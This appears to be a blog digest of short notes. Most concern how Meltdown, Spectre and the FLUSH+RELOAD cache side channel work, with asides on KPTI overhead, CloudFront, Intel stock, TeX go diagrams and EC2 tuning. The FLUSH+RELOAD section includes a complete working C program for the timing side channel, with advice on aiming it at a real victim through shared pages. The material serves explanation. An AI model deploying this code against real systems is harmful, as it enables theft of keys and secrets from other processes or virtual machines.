## Reading notes: how the Meltdown attack works

The Meltdown paper is available at "Meltdown (PDF)". The vulnerability hits Intel CPUs hardest, while AMD is not affected. There are scattered reports about other platforms, but nothing like Intel, where essentially every CPU of the past fifteen years is hit... (Pentium 4 and everything after it; the paper itself puts it at potentially every Intel processor since 1995, except Itanium and Atom before 2013.)

Meltdown rests on the following preconditions, and from them obtains a memory dump of arbitrary addresses:

• Out-of-order execution at the µOP level, with a rollback mechanism for when a path that was executed ahead of time turns out to be wrong.
• Side-channel information leaks caused by the cache.
• During out-of-order execution, the permission check on a memory access is not enforced before the loaded data is used: the check happens, but only when the instruction retires, after the dependent instructions have already run.

Out-of-order execution is covered in any undergraduate computer organization course, but as I remember it, the lecture only went as far as "instructions are reordered only once they are confirmed to be independent". Modern CPUs go much further, in two respects:

• First, µOPs: each assembly instruction is broken into finer micro-operations, and out-of-order execution operates on those µOPs.
• Second, the CPU may run ahead and execute first; if it later discovers it was wrong, it rolls back.

Meltdown is some form of race condition between the fetch of a memory address and the corresponding permission check for this address.

On Linux and OS X, this is done via a direct-physical map, i.e., the entire physical memory is directly mapped to a pre-defined virtual address (cf. Figure 2).

Instead of a direct-physical map, Windows maintains multiple so-called paged pools, non-paged pools, and the system cache. These pools are virtual memory regions in the kernel address space mapping physical pages to virtual addresses which are either required to remain in the memory (non-paged pool) or can be removed from the memory because a copy is already stored on the disk (paged pool). The system cache further contains mappings of all file-backed pages. Combined, these memory pools will typically map a large fraction of the physical memory into the kernel address space of every process.

## CloudFront Tokyo now up to seven Edge locations...

Amazon CloudFront announces six new Edge Locations that are now part of its global network. These six new Edge Locations are located in the following cities:

Perth, Australia; Chennai, India; Rio De Janeiro, Brazil; Los Angeles, California; and two additional Edge Locations in Tokyo, Japan.

## FLUSH+RELOAD, used by both Meltdown and Spectre

Both the Meltdown and Spectre attacks use the FLUSH+RELOAD technique. It comes from the 2013 paper "Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack", which at the time also earned GnuPG a CVE, CVE-2013-4242.

FLUSH+RELOAD aims to extract side-channel information through shared memory and the cache, and to use it to get around security mechanisms. The sharing is the precondition: spy and victim must map the same physical pages, which is why the paper relies on mmap of the victim's executable within one OS and on page de-duplication across VMs.

To achieve sharing, the spy mmaps the victim’s executable file into the spy’s virtual address space. As the Linux loader maps executable files into the process when executing them, the spy and the victim share the memory image of the mapped file.

For the cross-VM scenario we used two different hypervisors: VMware ESXi 5.1 on the HP machine and Centos 6.5 with KVM on the Dell machine. In each hypervisor we created two virtual machines, one for the victim and the other for the spy. The virtual machines run CentOS 6.5 Linux. In this scenario, the spy mmaps a copy of the victim’s executable file. Sharing is achieved through the page de-duplication mechanisms of the hypervisors.

• During the first phase, the monitored memory line is flushed from the cache hierarchy.
• The spy, then, waits to allow the victim time to access the memory line before the third phase.
• In the third phase, the spy reloads the memory line, measuring the time to load it.
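The three phases above are the receiver side of every cache-timing attack on this page: in Meltdown and Spectre the victim access of phase two is the transiently executed load that the CPU later rolls back, but the cache line it pulled in survives the rollback, and FLUSH+RELOAD reads it out. The C program below is an added example (mine, not code from the FLUSH+RELOAD paper, the Meltdown paper, or any of the projects mentioned here). It lays out 256 probe lines one page apart, flushes them with clflush, lets a stand-in victim touch the line selected by a secret byte, then times each reload with rdtscp and takes the fastest line, with a majority vote across rounds to absorb interrupts and prefetcher noise. The probe array, the victim stub and the secret value are all constructed for the demo; the code needs an x86 CPU and degrades to a no-op elsewhere.

```c
/* flush_reload.c - FLUSH+RELOAD covert channel demo (added example, constructed for this page). */
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>           /* _mm_clflush, _mm_mfence, __rdtscp */
#define FR_SUPPORTED 1
#else
#define FR_SUPPORTED 0           /* no clflush/rdtsc here: everything becomes a no-op */
#endif

#define LINES  256               /* one probe line per possible byte value */
#define STRIDE 4096              /* a page apart, so the adjacent-line prefetcher cannot help the victim */

/* Constructed probe buffer. In a real attack this is memory shared with the victim
   (an mmap'd executable, a de-duplicated page); here sender and receiver share a process. */
static uint8_t probe[LINES * STRIDE] __attribute__((aligned(4096)));

int flush_reload_supported(void) { return FR_SUPPORTED; }

/* Write to every page once so the kernel backs each with its own private frame;
   untouched BSS pages would all alias the shared zero page and defeat the experiment. */
static void init_probe(void) {
    static int done;
    if (done) return;
    for (int i = 0; i < LINES; i++) probe[i * STRIDE] = (uint8_t)i;
    done = 1;
}

static inline void flush_line(const void *p) {
#if FR_SUPPORTED
    _mm_clflush(p);
#else
    (void)p;
#endif
}

/* Cycles taken by one load of *p. rdtscp waits for earlier instructions, so the
   second timestamp is not taken before the load has completed. */
static inline uint64_t reload_cycles(const volatile uint8_t *p) {
#if FR_SUPPORTED
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
#else
    (void)p;
    return 0;
#endif
}

/* Stand-in victim: in Meltdown/Spectre this load runs transiently and is rolled back,
   but the probe line it brings into the cache stays there. */
static void victim_touch(uint8_t secret) {
    (void)*(volatile uint8_t *)&probe[(size_t)secret * STRIDE];
}

/* One FLUSH+RELOAD round: phase 1 flush, phase 2 let the victim run, phase 3 reload and time.
   Returns the index of the fastest, i.e. cached, line. */
static int flush_reload_once(uint8_t secret) {
    for (int i = 0; i < LINES; i++) flush_line(&probe[i * STRIDE]);
#if FR_SUPPORTED
    _mm_mfence();                /* clflush is weakly ordered; make sure the flushes land first */
#endif
    victim_touch(secret);

    int best = -1;
    uint64_t best_t = UINT64_MAX;
    for (int k = 0; k < LINES; k++) {
        int i = (k * 167 + 13) & 0xff;   /* odd multiplier: visits every line once, in scrambled order */
        uint64_t t = reload_cycles(&probe[i * STRIDE]);
        if (t < best_t) { best_t = t; best = i; }
    }
    return best;
}

/* Majority vote over several rounds: an interrupt during one round only adds one wrong vote.
   Returns -1 on CPUs without clflush/rdtsc. */
int recover_byte(uint8_t secret, int rounds) {
    if (!FR_SUPPORTED) return -1;
    init_probe();
    int votes[LINES] = {0};
    for (int r = 0; r < rounds; r++) {
        int g = flush_reload_once(secret);
        if (g >= 0) votes[g]++;
    }
    int best = 0;
    for (int i = 1; i < LINES; i++) if (votes[i] > votes[best]) best = i;
    return best;
}

int main(void) {
    if (!flush_reload_supported()) { puts("needs an x86 CPU"); return 0; }
    uint8_t secret = 0x41;       /* constructed "secret" that the victim leaks by touching one line */
    printf("secret 0x%02x, recovered 0x%02x\n", secret, recover_byte(secret, 100));
    return 0;
}
```

Build with `gcc -O2 flush_reload.c` on x86-64 Linux. No shared memory is needed here because sender and receiver live in the same process; against a real victim the probe array has to be memory both sides map, which is what the paper's mmap of the victim's executable and the hypervisor's page de-duplication provide. If the recovered byte is wrong, the usual causes are a prefetcher dragging in neighbouring lines (hence the page stride and the scrambled probe order) or a hypervisor that traps rdtsc and makes the timer too coarse.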

We demonstrate the efficacy of the FLUSH+RELOAD attack by using it to extract the private encryption keys from a victim program running GnuPG 1.4.13. We tested the attack both between two unrelated processes in a single operating system and between processes running in separate virtual machines. On average, the attack is able to recover 96.7% of the bits of the secret key by observing a single signature or decryption round.

## Intel's CEO is doing great XDDD

On Nov. 29, Brian Krzanich, the CEO of chip giant Intel (NASDAQ:INTC), reported several transactions in Intel stock in a Form 4 filing with the SEC.

Those two transactions left Krzanich with exactly 250,000 shares -- the bare minimum that he's required to hold as CEO.

## psgo_emitter, a package for producing go (weiqi) diagrams in TeX

psgo_emitter is a (Windows) console utility to create go diagrams for go life-and-death problems (tsumego).

    \begin{psgopartialboard}{(1,1)(8,6)}
    \stone{black}{b}{3}
    \stone{black}{d}{3}
    \stone{black}{b}{4}
    \stone{white}{d}{5}
    \stone{white}{g}{2}
    \stone{black}{d}{2}
    \stone{white}{b}{5}
    \stone{white}{c}{4}
    \stone{white}{e}{4}
    \stone{white}{e}{3}
    \stone{white}{e}{2}
    \stone{black}{e}{1}
    \end{psgopartialboard}

    \begin{psgopartialboard}{(1,1)(8,6)}
    \stone{black}{b}{3}
    \stone[\marklb{1}]{black}{a}{2}
    \stone{black}{d}{3}
    \stone{black}{b}{4}
    \stone[\marklb{8}]{white}{f}{1}
    \stone[\marklb{6}]{white}{d}{1}
    \stone{white}{e}{2}
    \stone{white}{g}{2}
    \stone{black}{d}{2}
    \stone{white}{b}{5}
    \stone[\marklb{7}]{black}{b}{2}
    \stone[\marklb{9}]{black}{a}{1}
    \stone{white}{c}{4}
    \stone[\marklb{4}]{white}{c}{2}
    \stone{white}{e}{4}
    \stone[\marklb{5}]{black}{c}{3}
    \stone{white}{e}{3}
    \stone[\marklb{2}]{white}{b}{1}
    \stone{white}{d}{5}
    \stone[\marklb{3}]{black}{a}{4}
    \stone{black}{e}{1}
    \end{psgopartialboard}

## Linus is (again) unhappy... XD

Please talk to management. Because I really see exactly two possibilities:

- Intel never intends to fix anything

OR

- these workarounds should have a way to disable them.

Which of the two is it?

## Spectre and Meltdown, two sets of CPU security vulnerabilities

The Register published "Kernel-memory-leaking Intel processor design flaw forces Linux, Windows redesign", a fairly complete description of this round of vulnerabilities (by IT news media standards) that cites a good amount of material and tries to explain the problem.

• Variant 1: bounds check bypass (CVE-2017-5753)
• Variant 2: branch target injection (CVE-2017-5715)
• Variant 3: rogue data cache load (CVE-2017-5754)

(On the Variant 1 case) If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU.

KAISER will affect performance for anything that does system calls or interrupts: everything. Just the new instructions (CR3 manipulation) add a few hundred cycles to a syscall or interrupt. Most workloads that we have run show single-digit regressions. 5% is a good round number for what is typical. The worst we have seen is a roughly 30% regression on a loopback networking test that did a ton of syscalls and context switches.

KAISER was later renamed KPTI (kernel page-table isolation); keep that in mind when searching for material. On a Linux kernel that carries the fix, /sys/devices/system/cpu/vulnerabilities/meltdown reports whether PTI is active on the running system.

With these VM results so far it's still a far cry from the "30%" performance hit that's been hyped up by some of the Windows publications, etc. It's still highly dependent upon the particular workload and system how much performance may be potentially lost when enabling page table isolation within the kernel.

## The parameters Netflix tunes on EC2

Brendan Gregg has written up the parameters Netflix tunes on EC2: "AWS re:Invent 2017: How Netflix Tunes EC2".

My last talk for 2017 was at AWS re:Invent, on "How Netflix Tunes EC2 Instances for Performance," an updated version of my 2014 talk.

WARNING: These tunables were developed in late 2017, for Ubuntu Xenial instances on EC2.

## The upcoming Xdebug 2.6 can observe PHP's GC behaviour

Xdebug's built-in garbage collection statistics profiler allows you to find out when the PHP internal garbage collector triggers, how many variables it was able to clean up, how long it took, and how much memory was actually freed.